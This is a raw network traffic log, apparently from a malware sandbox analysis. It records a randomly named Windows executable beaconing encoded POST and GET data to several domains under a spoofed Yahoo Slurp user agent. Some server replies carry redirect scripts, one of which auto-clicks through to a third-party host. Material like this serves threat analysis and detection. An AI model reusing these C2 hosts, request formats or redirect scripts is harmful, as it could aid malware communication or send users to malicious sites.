Jul 8, 2024 07:22:03.793648005 CEST	720	OUT	POST /ch4t/ HTTP/1.1 Host: www.quixaclienti.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.quixaclienti.com Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 201 Referer: http://www.quixaclienti.com/ch4t/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 2b 58 51 4a 76 39 58 45 73 7a 4b 37 54 72 33 56 64 38 5a 61 30 61 69 64 34 72 30 32 48 4d 53 48 6b 51 71 34 51 7a 71 48 62 4b 39 67 70 4d 58 75 45 2b 44 56 31 4e 71 78 64 62 2f 79 67 4c 4c 38 43 76 42 54 42 59 46 74 2b 76 50 34 66 2f 75 37 30 70 67 31 43 42 48 69 77 56 33 73 34 6e 61 34 63 44 56 53 6c 39 57 70 67 74 64 44 50 77 41 53 51 57 42 6a 46 30 5a 61 56 57 38 6d 6e 6f 57 58 4a 48 35 4a 6d 44 45 63 68 6d 52 73 73 2f 44 32 4c 2f 69 66 31 74 6b 56 61 70 50 56 6d 58 42 6e 6a 45 34 45 37 68 41 4d 7a 64 33 64 43 75 69 65 37 58 59 56 49 32 66 42 70 74 61 58 59 50 37 49 6d 51 3d 3d Data Ascii: MdEl=+XQJv9XEszK7Tr3Vd8Za0aid4r02HMSHkQq4QzqHbK9gpMXuE+DV1Nqxdb/ygLL8CvBTBYFt+vP4f/u70pg1CBHiwV3s4na4cDVSl9WpgtdDPwASQWBjF0ZaVW8mnoWXJH5JmDEchmRss/D2L/if1tkVapPVmXBnjE4E7hAMzd3dCuie7XYVI2fBptaXYP7ImQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49775	3.33.130.190	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:22:06.401206970 CEST	740	OUT	POST /ch4t/ HTTP/1.1 Host: www.quixaclienti.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.quixaclienti.com Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 221 Referer: http://www.quixaclienti.com/ch4t/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 2b 58 51 4a 76 39 58 45 73 7a 4b 37 53 4c 6e 56 62 66 42 61 6c 4b 69 43 6b 37 30 32 4a 73 54 41 6b 51 6d 34 51 79 65 74 62 63 74 67 70 74 6e 75 46 2f 44 56 37 74 71 78 50 37 2f 7a 2f 37 4c 4a 43 76 4e 6c 42 61 52 74 2b 76 4c 34 66 2b 2b 37 30 5a 63 32 51 68 48 6b 70 46 33 75 31 48 61 34 63 44 56 53 6c 35 47 54 67 74 6c 44 4f 44 6f 53 54 79 74 73 62 6b 5a 64 63 32 38 6d 6a 6f 57 54 4a 48 35 33 6d 43 70 37 68 6b 5a 73 73 39 4c 32 4b 71 43 63 2f 74 6c 51 55 4a 4f 37 68 46 41 30 6c 52 64 6f 78 42 49 4a 73 50 2b 39 44 6f 7a 45 71 6d 35 43 61 32 37 79 30 71 54 6a 56 4d 47 42 39 54 34 74 67 47 66 32 42 4d 31 67 71 55 55 68 69 2b 4c 63 34 30 6b 3d Data Ascii: MdEl=+XQJv9XEszK7SLnVbfBalKiCk702JsTAkQm4QyetbctgptnuF/DV7tqxP7/z/7LJCvNlBaRt+vL4f++70Zc2QhHkpF3u1Ha4cDVSl5GTgtlDODoSTytsbkZdc28mjoWTJH53mCp7hkZss9L2KqCc/tlQUJO7hFA0lRdoxBIJsP+9DozEqm5Ca27y0qTjVMGB9T4tgGf2BM1gqUUhi+Lc40k=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49776	3.33.130.190	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:22:08.945113897 CEST	10822	OUT	POST /ch4t/ HTTP/1.1 Host: www.quixaclienti.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.quixaclienti.com Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 10301 Referer: http://www.quixaclienti.com/ch4t/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 2b 58 51 4a 76 39 58 45 73 7a 4b 37 53 4c 6e 56 62 66 42 61 6c 4b 69 43 6b 37 30 32 4a 73 54 41 6b 51 6d 34 51 79 65 74 62 63 6c 67 6f 66 44 75 45 63 37 56 36 74 71 78 4d 37 2f 75 2f 37 4c 75 43 75 6c 35 42 61 4e 39 2b 71 58 34 5a 63 6d 37 79 72 34 32 61 68 48 6b 30 56 33 76 34 6e 61 58 63 44 46 65 6c 39 69 54 67 74 6c 44 4f 46 55 53 48 57 42 73 5a 6b 5a 61 56 57 39 6e 6e 6f 58 4f 4a 48 68 42 6d 43 74 42 68 56 35 73 72 64 62 32 4d 5a 71 63 7a 74 6c 65 5a 70 4f 56 68 46 4e 73 6c 56 39 53 78 41 4d 6a 73 4e 69 39 48 34 33 59 36 56 68 66 4f 55 50 50 72 70 2b 46 56 74 36 5a 69 43 49 46 6c 32 66 76 5a 64 56 57 78 6d 39 79 34 4c 6a 6d 6c 55 65 53 78 65 34 72 74 6b 4f 35 4c 6d 4b 71 76 65 32 68 4b 34 61 6d 36 58 63 74 76 65 76 44 62 58 58 53 69 34 43 4e 70 54 35 55 73 56 31 44 62 6b 73 43 35 54 37 69 34 71 52 49 6a 41 4c 74 62 6f 38 77 69 70 31 68 65 4e 43 67 75 70 44 48 76 62 45 36 73 42 68 5a 72 55 4c 38 59 2f 52 7a 6e 35 59 70 65 6a 79 76 50 41 4e 61 50 37 6f 34 53 4e 6a 46 53 4c 33 58 39 [TRUNCATED] Data Ascii: MdEl=+XQJv9XEszK7SLnVbfBalKiCk702JsTAkQm4QyetbclgofDuEc7V6tqxM7/u/7LuCul5BaN9+qX4Zcm7yr42ahHk0V3v4naXcDFel9iTgtlDOFUSHWBsZkZaVW9nnoXOJHhBmCtBhV5srdb2MZqcztleZpOVhFNslV9SxAMjsNi9H43Y6VhfOUPPrp+FVt6ZiCIFl2fvZdVWxm9y4LjmlUeSxe4rtkO5LmKqve2hK4am6XctvevDbXXSi4CNpT5UsV1DbksC5T7i4qRIjALtbo8wip1heNCgupDHvbE6sBhZrUL8Y/Rzn5YpejyvPANaP7o4SNjFSL3X9mVr6jmzxQuV2bOwY6boFaGsroIniSjYcboKufwucpIV1WhygKNVp67baGL6BL7tYBx0XsTsfejqUxh2dohJJEi6n0utyqFR4DbTWwjv53VnVZwPFjUxr3/g1uCOokXxKQNifQtrPBFRkB3S2RO49qAvPH5YVORXq6plY1gedq79ZDNXpap63B9exgQiTPcJpBEi4PUleeYFMOtnC5zdXEoV23TzytjKUUVxczpoFzNO82T+euiI3Hh0b9iL8upfCjcp3NAJCwnjlgNfn3d3peYsha8/U9atrZs2Ck5SL5RnJl02piSRxWJglO6RWXw+WRAHeG78LBpIQAmOmzuLToXWh2ueI3msUgz+easCczgX7rUEGzgJToQwoA4m9odQF9Nz2tNwaHNPXEMXQ/eTixGJoDfA9phOvGoDBu0K5bOQSmicp6MBBs5O/9z8p6HyijrxbcSF78f7/UJhGGndoA1FIctJEsHlAUzb2ohLwZYiG9UsVxc0Gxrnx7zTRgYI9Vf1HUNlCG1WEq1MwAZyzzBCeI8WiLkuW+LnejUdjHJ4vy6AAtWvNGd9m8VvRa61x6oc0trXCTJy+mrfK/Mm0kEK+hVJXUOneMIBqhXWwL2Yf6FJMVlNcsgf0FBt7YAW3vQPJC/2YHXkw/SnJogILmkh7DMN+lNmBDx [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49777	3.33.130.190	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:22:11.489639997 CEST	454	OUT	GET /ch4t/?MdEl=zV4psITF3VeqDPaqevV/ztXjzJ8EZ83YyjWfRnGJKOsPmd/sGMCn1Nm1D4KIw/eYCOcCLvh/+vn7ften9OcVCw2qyEvOyn2Tbh4jjcvU+JdLP1FjOVd5YU4=&cv4D=Bv0xSH88iTF48zS0 HTTP/1.1 Host: www.quixaclienti.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Jul 8, 2024 07:22:12.128046989 CEST	402	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 08 Jul 2024 05:22:11 GMT Content-Type: text/html Content-Length: 262 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4d 64 45 6c 3d 7a 56 34 70 73 49 54 46 33 56 65 71 44 50 61 71 65 76 56 2f 7a 74 58 6a 7a 4a 38 45 5a 38 33 59 79 6a 57 66 52 6e 47 4a 4b 4f 73 50 6d 64 2f 73 47 4d 43 6e 31 4e 6d 31 44 34 4b 49 77 2f 65 59 43 4f 63 43 4c 76 68 2f 2b 76 6e 37 66 74 65 6e 39 4f 63 56 43 77 32 71 79 45 76 4f 79 6e 32 54 62 68 34 6a 6a 63 76 55 2b 4a 64 4c 50 31 46 6a 4f 56 64 35 59 55 34 3d 26 63 76 34 44 3d 42 76 30 78 53 48 38 38 69 54 46 34 38 7a 53 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?MdEl=zV4psITF3VeqDPaqevV/ztXjzJ8EZ83YyjWfRnGJKOsPmd/sGMCn1Nm1D4KIw/eYCOcCLvh/+vn7ften9OcVCw2qyEvOyn2Tbh4jjcvU+JdLP1FjOVd5YU4=&cv4D=Bv0xSH88iTF48zS0"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49778	3.33.130.190	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:22:17.169641018 CEST	738	OUT	POST /aoam/ HTTP/1.1 Host: www.789bet1okvip.solutions Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.789bet1okvip.solutions Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 201 Referer: http://www.789bet1okvip.solutions/aoam/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 4a 71 54 42 78 78 65 4d 76 73 4e 2f 62 2f 41 35 44 67 43 62 58 46 4f 4e 67 34 39 79 58 5a 35 6a 66 64 38 47 36 6d 55 56 37 70 55 41 64 47 70 55 70 4e 56 32 66 64 2b 4c 67 6f 74 31 48 51 36 48 76 32 43 61 37 47 75 62 76 5a 65 4d 6c 43 37 4b 2f 64 70 46 61 51 77 39 64 53 74 55 49 43 46 76 67 69 55 43 4c 53 5a 53 46 50 70 46 35 71 6b 35 39 2f 74 38 65 7a 37 5a 6e 59 4f 42 75 59 79 64 41 7a 74 57 4c 30 31 47 75 66 41 64 4c 33 76 69 45 35 6d 7a 6b 70 4d 54 71 52 4f 47 62 6a 67 76 76 71 70 4f 7a 31 65 4b 64 4e 55 68 35 65 30 31 50 73 2b 36 71 69 6e 72 5a 6b 71 49 57 35 4e 44 68 77 3d 3d Data Ascii: MdEl=JqTBxxeMvsN/b/A5DgCbXFONg49yXZ5jfd8G6mUV7pUAdGpUpNV2fd+Lgot1HQ6Hv2Ca7GubvZeMlC7K/dpFaQw9dStUICFvgiUCLSZSFPpF5qk59/t8ez7ZnYOBuYydAztWL01GufAdL3viE5mzkpMTqROGbjgvvqpOz1eKdNUh5e01Ps+6qinrZkqIW5NDhw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49779	3.33.130.190	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:22:19.711725950 CEST	758	OUT	POST /aoam/ HTTP/1.1 Host: www.789bet1okvip.solutions Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.789bet1okvip.solutions Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 221 Referer: http://www.789bet1okvip.solutions/aoam/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 4a 71 54 42 78 78 65 4d 76 73 4e 2f 5a 66 77 35 47 43 71 62 56 6c 4f 4f 73 59 39 79 64 35 35 6e 66 64 77 47 36 6a 6b 37 37 62 77 41 64 6a 56 55 6f 4a 42 32 50 4e 2b 4c 30 34 73 2f 44 51 36 63 76 32 4f 6b 37 43 71 62 76 64 2b 4d 6c 41 7a 4b 2f 4b 46 43 62 41 77 2f 62 53 74 57 47 69 46 76 67 69 55 43 4c 53 63 61 46 4c 46 46 35 61 30 35 38 61 4e 39 54 54 37 61 7a 49 4f 42 35 49 79 5a 41 7a 74 77 4c 31 35 73 75 64 49 64 4c 31 33 69 45 74 4b 30 2f 35 4d 4a 33 68 4f 58 64 47 4a 31 6f 34 4e 42 36 6e 75 53 59 64 42 46 38 59 6c 76 65 64 66 74 34 69 44 59 45 6a 6a 38 62 36 77 4b 36 38 38 6c 32 42 66 62 42 42 6e 6b 4b 63 4c 45 77 76 69 46 49 75 55 3d Data Ascii: MdEl=JqTBxxeMvsN/Zfw5GCqbVlOOsY9yd55nfdwG6jk77bwAdjVUoJB2PN+L04s/DQ6cv2Ok7Cqbvd+MlAzK/KFCbAw/bStWGiFvgiUCLScaFLFF5a058aN9TT7azIOB5IyZAztwL15sudIdL13iEtK0/5MJ3hOXdGJ1o4NB6nuSYdBF8Ylvedft4iDYEjj8b6wK688l2BfbBBnkKcLEwviFIuU=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49780	3.33.130.190	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:22:22.255074024 CEST	10840	OUT	POST /aoam/ HTTP/1.1 Host: www.789bet1okvip.solutions Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.789bet1okvip.solutions Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 10301 Referer: http://www.789bet1okvip.solutions/aoam/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 4a 71 54 42 78 78 65 4d 76 73 4e 2f 5a 66 77 35 47 43 71 62 56 6c 4f 4f 73 59 39 79 64 35 35 6e 66 64 77 47 36 6a 6b 37 37 62 34 41 64 78 74 55 70 75 74 32 64 64 2b 4c 6f 49 73 38 44 51 37 65 76 79 69 65 37 48 7a 6d 76 62 79 4d 6b 6a 72 4b 6f 6f 39 43 53 41 77 2f 5a 53 74 62 49 43 46 6d 67 6d 35 4c 4c 53 4d 61 46 4c 46 46 35 63 77 35 38 50 74 39 41 6a 37 5a 6e 59 4f 33 75 59 7a 4f 41 7a 31 4f 4c 31 74 57 76 70 45 64 4c 56 6e 69 4a 2b 79 30 7a 35 4d 58 32 68 50 4b 64 47 4d 72 6f 34 51 77 36 6e 32 6f 59 66 64 46 2b 59 68 32 42 63 7a 6b 72 68 44 79 47 77 4b 59 44 37 63 79 33 4d 6b 52 6c 52 58 48 64 51 4c 4f 45 76 75 6a 31 2f 47 43 52 5a 76 45 59 66 2b 33 65 62 37 48 48 52 52 50 77 4d 45 52 37 54 64 33 4c 79 70 32 52 4b 77 42 2f 39 57 7a 4f 4f 2f 6c 68 68 4a 44 66 50 36 56 31 43 48 68 59 30 63 78 44 70 69 37 53 47 66 54 78 68 6e 49 76 73 66 5a 57 58 6f 6e 4d 54 6c 35 6b 56 74 64 4b 58 42 6d 2f 49 32 72 73 49 54 36 37 45 45 58 70 6d 46 6e 31 75 4a 69 67 31 4e 34 43 4e 61 4f 4c 47 56 69 2b [TRUNCATED] Data Ascii: MdEl=JqTBxxeMvsN/Zfw5GCqbVlOOsY9yd55nfdwG6jk77b4AdxtUput2dd+LoIs8DQ7evyie7HzmvbyMkjrKoo9CSAw/ZStbICFmgm5LLSMaFLFF5cw58Pt9Aj7ZnYO3uYzOAz1OL1tWvpEdLVniJ+y0z5MX2hPKdGMro4Qw6n2oYfdF+Yh2BczkrhDyGwKYD7cy3MkRlRXHdQLOEvuj1/GCRZvEYf+3eb7HHRRPwMER7Td3Lyp2RKwB/9WzOO/lhhJDfP6V1CHhY0cxDpi7SGfTxhnIvsfZWXonMTl5kVtdKXBm/I2rsIT67EEXpmFn1uJig1N4CNaOLGVi+2S9GdXzGwJcevXeui+tk0qMPBSo+ThE86m9s7hHnRyms8NTnxcN0NQWPO0wVxFuWPcUCM6TO2aBd0eqfonB8VN6b0k+psL5TWsIwl35yY8YiuHYlFBzyALItJWwpzCN4HibVNNncuCxlMmkygM1OZcTp1a14+4z/dS3+0q1rL6FaQOLcsxq08Ma+w429FzMgQVT1gF4aFyJURhcP4IJ3zlYQ/J+clcPtMz3orA3wO51BLzkljWyTHCt3JCMfa1akEfqeWvJTBq01vACBPDJ4tSzSvFBJTjg0BNH+haqyWnxfDyJyM00B2IWMXvW3WWPlPbPoxUS9xDDPG/sjIJBXqTeMOhGLfU64HCJYKEehqSIO8mwst8hR6cITpYnDvLPxTu6aiB/ThiBYkHck70eFvlaSl84J3YUJNquN60TYCmwsahQJBj1kValYW1tL9Hk2AB0eF+BgQGTvzibFxHLJDY1Thz4uRx/qfFiMfDShW1oFysa20mH2qfFpZC1sONj0FMs6doMLXGsFwddrlkz9UdaT1MG2uD8JP8YG//0DtQuywpsDOwv9onHQvKwMRPGwOBtfbnnZukyrJwn5UZN+Hcjm/OomWgLxKf7OzoZiWXyr/Tz+l3tmxGl8JQQfglMJqEoXxp49bimsNReuB0/+btJ3Gk2h9gYZgF [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49781	3.33.130.190	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:22:24.783778906 CEST	460	OUT	GET /aoam/?MdEl=Eo7hyHn30cp3PMoxDjiBTCLymbRhKoJHHMc1+Dk3yrF+CAsKksIOHOuhtM05CC/e3HjWlDqziYa3lDzCuMJvHAJ+VSdLDx129114BTxIEL4w+Khlyco+cjU=&cv4D=Bv0xSH88iTF48zS0 HTTP/1.1 Host: www.789bet1okvip.solutions Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Jul 8, 2024 07:22:25.259282112 CEST	402	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 08 Jul 2024 05:22:25 GMT Content-Type: text/html Content-Length: 262 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4d 64 45 6c 3d 45 6f 37 68 79 48 6e 33 30 63 70 33 50 4d 6f 78 44 6a 69 42 54 43 4c 79 6d 62 52 68 4b 6f 4a 48 48 4d 63 31 2b 44 6b 33 79 72 46 2b 43 41 73 4b 6b 73 49 4f 48 4f 75 68 74 4d 30 35 43 43 2f 65 33 48 6a 57 6c 44 71 7a 69 59 61 33 6c 44 7a 43 75 4d 4a 76 48 41 4a 2b 56 53 64 4c 44 78 31 32 39 31 31 34 42 54 78 49 45 4c 34 77 2b 4b 68 6c 79 63 6f 2b 63 6a 55 3d 26 63 76 34 44 3d 42 76 30 78 53 48 38 38 69 54 46 34 38 7a 53 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?MdEl=Eo7hyHn30cp3PMoxDjiBTCLymbRhKoJHHMc1+Dk3yrF+CAsKksIOHOuhtM05CC/e3HjWlDqziYa3lDzCuMJvHAJ+VSdLDx129114BTxIEL4w+Khlyco+cjU=&cv4D=Bv0xSH88iTF48zS0"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49782	103.176.91.154	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:22:30.300559044 CEST	699	OUT	POST /8c7z/ HTTP/1.1 Host: www.334es.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.334es.com Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 201 Referer: http://www.334es.com/8c7z/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 68 77 79 4c 65 4b 45 57 54 77 38 78 47 74 51 74 37 4d 6c 37 62 6f 35 56 6e 41 77 4c 72 77 6e 6e 68 51 4d 30 76 63 61 54 39 56 63 74 4b 6b 64 39 52 76 59 54 69 55 78 44 54 66 71 64 67 71 6e 50 6a 6a 6f 6c 44 53 6a 50 6a 32 53 57 74 6e 2f 61 37 62 78 38 4d 6c 46 6d 46 7a 6c 59 6f 63 6f 53 51 74 33 37 54 65 52 66 53 6c 64 45 59 51 4c 47 46 32 78 44 30 41 31 63 43 6b 4e 68 33 78 52 49 66 66 39 39 57 32 56 30 6d 31 6d 4a 56 56 34 2b 4f 79 55 2b 2f 6d 6c 36 41 33 48 30 34 61 72 76 4e 6a 70 72 6d 42 66 6e 56 33 42 70 58 4b 48 69 52 6c 36 62 33 31 2f 75 31 50 6f 33 42 62 4b 2f 68 51 3d 3d Data Ascii: MdEl=hwyLeKEWTw8xGtQt7Ml7bo5VnAwLrwnnhQM0vcaT9VctKkd9RvYTiUxDTfqdgqnPjjolDSjPj2SWtn/a7bx8MlFmFzlYocoSQt37TeRfSldEYQLGF2xD0A1cCkNh3xRIff99W2V0m1mJVV4+OyU+/ml6A3H04arvNjprmBfnV3BpXKHiRl6b31/u1Po3BbK/hQ==
Jul 8, 2024 07:22:31.108577013 CEST	552	IN	HTTP/1.0 200 OK Connection: close Cache-Control: max-age=259200 Content-Type: text/html;charset=utf-8 Content-Length: 423 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 33 30 31 6d 65 69 2e 78 79 7a 3a 37 37 38 38 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 [TRUNCATED] Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://301mei.xyz:7788/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49783	103.176.91.154	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:22:32.831715107 CEST	719	OUT	POST /8c7z/ HTTP/1.1 Host: www.334es.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.334es.com Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 221 Referer: http://www.334es.com/8c7z/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 68 77 79 4c 65 4b 45 57 54 77 38 78 48 4e 67 74 2b 76 64 37 63 49 35 57 37 51 77 4c 77 67 6e 6a 68 51 41 30 76 64 75 44 39 48 6f 74 4b 45 74 39 57 75 59 54 6c 55 78 44 48 50 71 63 74 4b 6e 51 6a 6a 6c 51 44 54 50 50 6a 79 79 57 74 6d 50 61 36 73 63 71 4d 31 46 65 51 44 6c 47 6c 38 6f 53 51 74 33 37 54 65 56 31 53 6c 46 45 59 68 37 47 43 6e 78 45 71 51 31 62 46 6b 4e 68 67 68 52 4d 66 66 38 6f 57 33 4a 4f 6d 7a 71 4a 56 55 49 2b 50 6a 55 78 30 6d 6b 78 66 6e 47 42 37 5a 4b 77 55 52 55 4c 6e 68 33 57 61 58 41 4c 66 73 57 34 41 55 62 4d 6c 31 62 64 6f 49 68 44 4d 59 33 32 36 55 47 39 50 65 78 56 6f 49 54 61 76 4e 47 34 30 56 51 63 59 56 45 3d Data Ascii: 